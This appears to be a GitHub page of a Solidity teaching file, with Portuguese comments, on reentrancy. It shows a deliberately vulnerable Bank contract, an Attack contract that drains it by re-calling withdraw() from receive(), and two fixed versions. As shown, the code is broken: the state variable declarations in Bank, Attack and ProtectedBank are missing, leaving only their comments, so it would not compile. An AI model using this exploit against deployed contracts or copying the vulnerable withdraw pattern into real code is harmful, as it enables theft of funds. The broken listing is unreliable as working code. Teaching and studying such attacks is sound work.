forked from WTFAcademy/WTF-Solidity
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ReentrancyAttack.sol
118 lines (96 loc) · 3.75 KB
/
ReentrancyAttack.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
// SPDX-License-Identifier: MIT
// por 0xAA
pragma solidity ^0.8.21;
contract Bank {
// Mapeamento de saldo
// Depositar ether e atualizar o saldo
function deposit() external payable {
balanceOf[msg.sender] += msg.value;
}
// Extrair todos os ether do msg.sender
function withdraw() external {
// Obter saldo
uint256 balance = balanceOf[msg.sender];
require(balance > 0, "Insufficient balance");
// Transferir ether !!! Pode ativar a função fallback/receive de um contrato malicioso, há risco de reentrância!
(bool success, ) = msg.sender.call{value: balance}("");
require(success, "Failed to send Ether");
// Atualizar saldo
balanceOf[msg.sender] = 0;
}
// Obter o saldo do contrato bancário
function getBalance() external view returns (uint256) {
return address(this).balance;
}
}
contract Attack {
// Endereço do contrato Bank
// Inicializando o endereço do contrato Bank
constructor(Bank _bank) {
bank = _bank;
}
// Função de callback para realizar um ataque de reentrada no contrato Bank, chamando repetidamente a função withdraw do alvo.
receive() external payable {
if (address(bank).balance >= 1 ether) {
bank.withdraw();
}
}
// Função de ataque, chame com msg.value definido como 1 ether
function attack() external payable {
require(msg.value == 1 ether, "Require 1 Ether to attack");
bank.deposit{value: 1 ether}();
bank.withdraw();
}
// Obter o saldo deste contrato
function getBalance() external view returns (uint256) {
return address(this).balance;
}
}
// Usando o modo de verificação-efeito-interação (checks-effect-interaction) para prevenir ataques de reentrada
contract GoodBank {
mapping (address => uint256) public balanceOf;
function deposit() external payable {
balanceOf[msg.sender] += msg.value;
}
function withdraw() external {
uint256 balance = balanceOf[msg.sender];
require(balance > 0, "Insufficient balance");
// Verificar o modo de interação de efeitos (checks-effect-interaction): atualizar primeiro a alteração do saldo e, em seguida, enviar ETH.
// Quando ocorre um ataque de reentrada, balanceOf[msg.sender] já foi atualizado para 0, não passando pela verificação acima.
balanceOf[msg.sender] = 0;
(bool success, ) = msg.sender.call{value: balance}("");
require(success, "Failed to send Ether");
}
function getBalance() external view returns (uint256) {
return address(this).balance;
}
}
// Usando um bloqueio de reentrada para evitar ataques de reentrada
contract ProtectedBank {
mapping (address => uint256) public balanceOf;
// Lock Reentrante
// Lock Reentrante
modifier nonReentrant() {
// Quando nonReentrant é chamado pela primeira vez, _status será 0
require(_status == 0, "ReentrancyGuard: reentrant call");
// Após isso, qualquer chamada a nonReentrant falhará
_status = 1;
_;
// Chamada concluída, restaurando _status para 0
_status = 0;
}
function deposit() external payable {
balanceOf[msg.sender] += msg.value;
}
// Usando um lock de reentrada para proteger uma função com vulnerabilidades
function withdraw() external nonReentrant{
uint256 balance = balanceOf[msg.sender];
require(balance > 0, "Insufficient balance");
(bool success, ) = msg.sender.call{value: balance}("");
require(success, "Failed to send Ether");
balanceOf[msg.sender] = 0;
}
function getBalance() external view returns (uint256) {
return address(this).balance;
}
}